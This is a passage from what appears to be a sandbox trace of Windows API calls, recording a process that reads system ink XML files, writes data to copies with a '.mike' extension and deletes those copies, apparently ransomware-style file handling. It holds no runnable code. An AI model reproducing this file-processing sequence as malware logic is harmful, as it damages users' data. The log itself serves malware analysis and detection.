"c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.364] GetFileType (hFile=0x264) returned 0x1 [0045.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.364] GetFileType (hFile=0x264) returned 0x1 [0045.364] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.364] ReadFile (in: hFile=0x264, lpBuffer=0x22f0d80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22f0d80*, lpNumberOfBytesRead=0x2af080*=0xd1, lpOverlapped=0x0) returned 1 [0045.365] CloseHandle (hObject=0x264) returned 1 [0045.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.366] GetFileType (hFile=0x264) returned 0x1 [0045.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.366] GetFileType (hFile=0x264) returned 0x1 [0045.366] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.366] WriteFile (in: hFile=0x264, lpBuffer=0x22f3fe0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22f3fe0*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0045.366] CloseHandle (hObject=0x264) returned 1 [0045.367] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.367] GetFileType (hFile=0x264) returned 0x1 [0045.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.367] GetFileType (hFile=0x264) returned 0x1 [0045.368] WriteFile (in: hFile=0x264, lpBuffer=0x22f7214*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22f7214*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.369] CloseHandle (hObject=0x264) returned 1 [0045.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.369] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d5d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53d5d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53fbe80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22f89d0 | out: lpFileInformation=0x22f89d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d5d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53d5d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53fbe80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", dwFileAttributes=0x80) returned 0 [0045.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.371] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d5d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53d5d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53fbe80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.372] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike")) returned 1 [0045.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.374] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.374] GetFileType (hFile=0x264) returned 0x1 [0045.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.374] GetFileType (hFile=0x264) returned 0x1 [0045.374] CloseHandle (hObject=0x264) returned 1 [0045.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), fInfoLevelId=0x0, lpFileInformation=0x22fab58 | out: lpFileInformation=0x22fab58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), fInfoLevelId=0x0, lpFileInformation=0x22fae88 | out: lpFileInformation=0x22fae88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.376] GetFileType (hFile=0x264) returned 0x1 [0045.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.376] GetFileType (hFile=0x264) returned 0x1 [0045.376] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.376] WriteFile (in: hFile=0x264, lpBuffer=0x22fbd88*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22fbd88*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.377] CloseHandle (hObject=0x264) returned 1 [0045.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.377] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), fInfoLevelId=0x0, lpFileInformation=0x22fb870 | out: lpFileInformation=0x22fb870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.378] GetFileType (hFile=0x264) returned 0x1 [0045.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.378] GetFileType (hFile=0x264) returned 0x1 [0045.380] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.380] ReadFile (in: hFile=0x264, lpBuffer=0x20fa894, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20fa894*, lpNumberOfBytesRead=0x2af080*=0xd7, lpOverlapped=0x0) returned 1 [0045.381] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.381] GetFileType (hFile=0x264) returned 0x1 [0045.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.382] GetFileType (hFile=0x264) returned 0x1 [0045.382] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.382] WriteFile (in: hFile=0x264, lpBuffer=0x20fdaf4*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x20fdaf4*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0045.382] CloseHandle (hObject=0x264) returned 1 [0045.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.383] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.383] GetFileType (hFile=0x264) returned 0x1 [0045.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.383] GetFileType (hFile=0x264) returned 0x1 [0045.384] WriteFile (in: hFile=0x264, lpBuffer=0x2100d28*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2100d28*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.384] CloseHandle (hObject=0x264) returned 1 [0045.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53fbe80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53fbe80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5421fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21024e4 | out: lpFileInformation=0x21024e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53fbe80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53fbe80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5421fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", dwFileAttributes=0x80) returned 0 [0045.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.387] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53fbe80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe53fbe80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5421fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpFilePart=0x0) returned 0x4c [0045.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike", lpFilePart=0x0) returned 0x51 [0045.387] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.mike")) returned 1 [0045.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", 